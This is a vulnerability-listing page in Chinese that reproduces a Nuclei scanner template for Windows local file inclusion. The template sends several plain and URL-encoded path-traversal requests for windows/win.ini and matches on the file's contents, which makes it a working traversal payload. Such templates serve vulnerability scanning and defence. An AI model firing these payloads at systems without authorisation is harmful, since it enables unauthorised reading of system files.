windows-lfi-fuzzing: Windows - Local File Inclusion Fuzzing

日期: 2025-08-01 | 影响软件: Windows | POC: 已公开

漏洞描述

Fuzzing for /windows/win.ini.

PoC代码[已公开]

id: windows-lfi-fuzzing

info:
  name: Windows - Local File Inclusion Fuzzing
  author: matejsmycka
  severity: high
  description: |
    Fuzzing for /windows/win.ini.
  tags: fuzz,windows,lfi,fuzzing,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
      - "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini"
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
      - "{{BaseURL}}/../../../../../../windows/win.ini"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a0047304502206fa07cb28d821067f0dacfbf8cd0444921513171ea214855b8e24f4c0ccd200a022100dea13643a53b720cee1e71b30bf3f7c0314bd9e97aeb7763c408fe2f11934a19:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/fuzzing/windows-lfi-fuzzing.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐